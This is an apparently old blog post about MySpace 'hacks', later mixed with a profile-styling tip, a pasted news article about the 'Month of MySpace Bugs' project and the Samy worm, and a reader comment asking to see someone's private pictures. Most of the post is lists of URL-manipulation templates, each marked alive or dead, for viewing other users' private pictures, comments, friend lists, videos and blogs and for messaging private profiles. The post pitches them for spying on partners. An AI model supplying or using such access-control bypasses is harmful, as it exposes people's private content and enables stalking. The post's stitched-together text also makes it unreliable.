Myspace service has become ridiculously very easy to hack. I try my best to keep this blogsecurity vulnerability on myspace or found some code that can compromise Myspace security settings for pictures, videos, private profiles and etc. Majority of the surfers searching for myspace hacks/code are usually people who either want to check up on their boyfriends or girlfriends. Most of these codes to hack Myspace involve some kind of url modification.
Updates with the latest hacks/codes that I find over the internet. These days even regular users spend their time trying to hack into Myspace. I seen a number of codes and hacks released for Myspace from hacks and code for private profiles, comments,videos, pictures and etc. As Myspace continues to patch up these hacks but users keep discovering new back holes and codes and hacks. Just do a search in google for Myspace hack or Myspace code you will find tons of sites that claim to have found some kind of Myspace back holes
Code :
http://blog.myspace.com/index.cfm?fuseaction=blog.edit&friendID=XXXXXX&blogID=XXXXXX
Explanation :
This is just an URL hack so it wont last long,
1. You replace the friendID with their friendid, and blogid with their blogid got it?
Well to view these the profile has to be public, or a friend of yours. You have to be able to see the blogs listed on their profile.
To get friendID and blogID, right click on the link and copy it, pick out the friendID and blogID.
http://blog.myspace.com/index.cfm?fuseaction=blog.view&friendID=488751456&blogID=125963547
View Private Pictures: *dead!
- use one of the following urls by replacing the XXs with the desired friend ID.
http://search.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://editprofile.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://invite.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://classifieds.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://groups.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://mail.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://forum.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://events.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://favorites.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
View Private Comments: *dead!
- use one of the following urls by replacing the XXs with the desired friend ID.
- to get past the 1st page, change the page=0 to page=1, page=2, ect..
- as agreed, thegeek from the that site also has other working codes for viewing comments on private profiles.. you can find them by doing a google search for grownupgeek
http://de.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://uk.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://forum.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://collect.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://events.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://classifieds.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://events.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://viewmorepics.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://classifieds.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://mail.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://ie.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://au.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://favorites.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://mail.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://favorites.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://editprofile.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://home.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://vids.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://groups.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://fr.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://invite.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
View Private Friends List: *alive!
- use one of the following urls by replacing the XXs with the desired friend ID.
- to get past the 1st page of friends, change the page=1 to page=2, page=3, ect.
http://collect.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://vids.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://forum.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://groups.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://editprofile.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://events.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://invite.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://mail.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://favorites.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://classifieds.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://search.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
View Private Videos: *alive!
- use one of the following urls by replacing the XXs with the desired friend ID.
http://groups.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://classifieds.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://mail.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://invite.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://search.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://collect.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://editprofile.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://forum.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://events.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://vids.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://favorites.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
Message ANYONE: *alivish!
- works with private profiles & away messages. this one needs to be fixed now!
- use one of the following urls by replacing the XXs with the desired friend ID.
http://home.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://au.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://uk.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://fr.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://www.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://de.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXX
http://messaging.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://ie.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
View Private Blogs: *alive!
- this is for private BLOGS not private profile blogs..
- props to both Rachel & Metasyntactic for this one!
- this one doesnt need the replacing of friend IDs.. just one word
example: if you go to view a blog and you see the red text saying that this blog is set for friends only, or preferred list only, or set to blog owner only, all you have to do is change one word in the url.
http://blog.myspace.com/index.cfm?fuseaction=blog.view&blogID=7845&friendid=0245
change the red to:
http://blog.myspace.com/index.cfm?fuseaction=blog.edit&blogID=3652&friendid=8564
.::How to Hack MySpace Individual profiles ::.
MySpace is popular, but not everyone likes the look of the profile. Today I found a guy who came up with a clever hack that will hide ads, clean up white space, and remove scroll bars, and so on.We Say: Of course, this is not a hack like the guy who made himself the most popular person on MySpace, but it’s good clean formatting fun.
I decided to tweak out my profile on MySpace. The goal was to completely hide everything on MySpace (including the ads), and replace it with something much cooler. This, of course, did not come easy. Here are a few of the obstacles I had to overcome:
- Hiding the iFrame which contains the ads (any CSS to hide iFrames is blocked)
- Positioning the new site at the very top of the page.
- Getting rid of the horizontal scroll bar after the CSS was applied.
- Hide existing comments so there isn’t whitespace at the bottom of the page.
Here is the CSS that needs to be copy and pasted into the “About Me” section of your MySpace profile. In the CSS the margin-left on .main, and .main table is half of the total width, and is a negative integer. For instance, if your width was 500px, margin-left would be -250px.
Here is the HTML that needs to be copy and pasted into the “I’d Like To Meet” section of your MySpace profile. You can replace the “INSERT YOUR SITE HERE” with your own HTML. Keep in mind that you CANNOT use id= on your divs because MySpace blocks them. Use class= instead.
Two unknown hackers say they will take on News Corp. next month by revealing dozens of flaws in the company's MySpace Web site."Mondo Armando" and "Müstaschio," two self-professed hackers who refuse to reveal their real names, plan to publish at least one MySpace bug every day in April as part of their new project, "The Month of MySpace Bugs, Yuss!"
"The purpose of the exercise is not so much to expose MySpace as a hive of spam and villainy (since everyone knows that already), but to highlight the monoculture-style danger of extremely popular websites populated by users of various levels of sophistication," they write on their blog.Then again, this may all be an elaborate April Fools' stunt. The hackers, who will launch their project on April 1, are pictured on their site in wigs and sunglasses, strutting in a Charlie's Angels-like pose. Then again, they insist it's not. "Yes, of course it's real," the site insists.
A MySpace spokesman had no comment on the proposed plan.Joke or not, the hackers have a point: MySpace is notoriously buggy. In October 2005, hacker Samy Kamkar created the first self-propagating cross-site worm on MySpace.com. Within hours, the worm spread to 1 million users, forcing them to add Samy as a friend and include the text "but most of all, samy is my hero" in their profiles. MySpace had to shut down the Web site to stop the infection. Kamkar later pleaded guilty to a felony charge and was sentenced to three years of probation and 90 days of community service.Fourteen months later, the Quickspace worm released infected Quicktime videos onto the site. When users played the video files in Internet Explorer or Firefox, infected video files posted on the user's MySpace page and replaced legitimate links on the profile with connections to phishing sites resembling the MySpace login page.MySpace officials have taken pains to improve security on the site, which is particularly vulnerable since it's nearly-anything-goes architecture allows users to import all sorts of programs and attach them directly to their member pages. Last year the company asked Adobe (nasdaq: ADBE - news - people ) to tweak its Flash software that made it harder for some programs, or "widgets," to direct traffic off the site. The move angered some programmers, but MySpace officials said it would improve the site's security.
Month of MySpace bugs intends to focus on "silly" Internet errors, such as cross-site scripting errors like the one used in Samy. Old, unpatched bugs and problems uncovered in third-party programs are all fair game, as long as they affect MySpace.com."Month of" bug busts are a trend among hackers eager to build up reputations and attract attention. Well-known security researcher H.D. Moore kicked off the first last July, hosting Month of Browser bugs. Since then, others have exposed flaws in kernel code, PHP programming language and Apple (nasdaq: AAPL - news - people ) products. The programs are disliked by many security researchers, who believe they open up computer users to new dangers. Traditionally, researchers disclose newly discovered vulnerabilities to vendors and software makers first, giving them time to publish a patch. The vendor later credits the researchers with the find.
Mondo Armando and Müstaschio are simultaneously honoring and mocking the month of exploits tradition. "If it ends up being just as lame as the Month of Apple Bugs, then we haven't really missed the mark," they wrote. "If it kills this Month of Whatever fad, then hurray for everyone, it's over."
Hey can you please help me see someones private pictures? my email is mikejohnston21@msn.com
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